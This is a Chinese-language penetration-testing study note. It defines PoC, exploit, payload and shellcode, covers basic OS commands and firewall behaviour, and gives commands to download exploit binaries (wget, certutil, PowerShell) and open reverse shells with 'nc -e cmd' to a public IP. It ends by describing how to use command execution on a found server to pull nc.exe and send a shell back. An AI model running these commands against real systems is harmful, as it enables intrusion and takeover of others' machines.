admin 管理员组

文章数量: 887016

#知识点:

1、名词解释-渗透测试-漏洞&攻击&后门&代码&专业词

2、必备技能-操作系统-用途&命令&权限&用户&防火墙

3、必备技能-文件下载-缘由&场景&使用-提权&后渗透

4、必备技能-反弹命令-缘由&场景&使用-提权&后渗透

前后端,POC/EXP,Payload/Shellcode,后门/Webshell,木马/病毒,

反弹,回显,跳板,黑白盒测试,暴力破解,社会工程学,撞库,ATT&CK等

名词解释

POC:全称"Proof of Concept",中文'概念验证',常指一段漏洞证明的代码。

EXP: 全称"Exploit",中文"利用,指利用系统漏洞进行攻击的动作。

Payload:中文"有效载荷",指成功exploit之后,真正在目标系统执行的代码或指令。

Shellcode: 简单翻译"shell代码",是Payload的一种,由于其建立正向/反向shell而得名。

基础案例1:操作系统-用途&命令&权限&用户&防火墙

1.个人计算机&服务器用机:

一般个人计算机大部分为:windows10、windows7.

服务器用机:windows server 2008、2012、2016

Linux: unbutu、centos

2.windows&Linux常见命令

Windows:dir //查看当前目录 ipconfig //查看IP地址

Linux:pwd//查看当前目录 ifconfig//查看IP地址

3.文件权限&服务权限&用户权限

windows:

whoami//查看当前用户的权限

system(系统最高权限)>administrator

Linux:

id//查看当前用户权限

system(系统最高权限) >root

4.自带防火墙出站&入站规则策略协议

windows:

Windows Defender(默认自带的防火墙)

出站的检测很宽容 对入站很严格

Linux:

iptables(默认自带的防火墙)

实用案例1:文件上传下载-解决无图形化&解决数据传输

Linux:

wget http://xxx/shell.exe //去下载文件

curl http://xxx/shell.exe -o shell.exe //下载下来 加-o 是重命名为 不加 默认直接下载下来

Python -m -SimpleHTTPServer 8080 //开放8080端口为http服务器

python3 -m http.server 8080

Windows:

PowerShell: powershell.exe -Command "Invoke-WebRequest -Uri http://127.0.0.1:8080/ms10-051.exe -OutFile exploit.exe"

CMD: certutil.exe -urlcache -split -f http://127.0.0.1:8080/ms10-051.exe exploit.exe

IPC$: copy \127.0.0.1\c$\ms10-051.exe C:\exploit.exe

实用案例2:反弹Shell命令-解决数据回显&解决数据通讯

useradd 用户名 passwd 用户名

测试Linux系统添加用户或修改密码命令交互回显问题

结合案例1:防火墙绕过-正向连接&反向连接&内网服务器

1、内网:

内网 -> hesy

hesy !-> 内网

2、防火墙:

hesy <->aliyun //正常通讯

hesy防火墙 ->aliyun

aliyun !-> hesy防火墙

nc -e cmd 47.75.121.155 5577 //把当前的cmd权限移交到指定IP

nv -lvvp 5577 /去监听本地5577端口 反弹shell

只能内网的IP主机去反弹shell给外网有IP的服务器,外网IP没办法反弹shell给一台内网的主机.(这就需要流量转发)

正向连接:

攻击者作为客户端去连接目标主机服务器端口。相当于是攻击者主动去找服务器

反向连接:

目标主机作为客户端去主动访问攻击者的端口。相当于目标主机是客户端,攻击者是服务端。

综合案例2:Fofa拿下同行Pikachu服务器

文件&反弹shell:

主要利用点在于命令执行这个漏洞,通过命令执行,让目标去下载外网上我们的nc.exe 然后通过 nc -e cmd IP 8888 主动去连接我们的端口。获得目标主机的shell(对于出站的流量,防火墙一般都很宽松)

本文标签: 防火墙 操作系统 文件 shell amp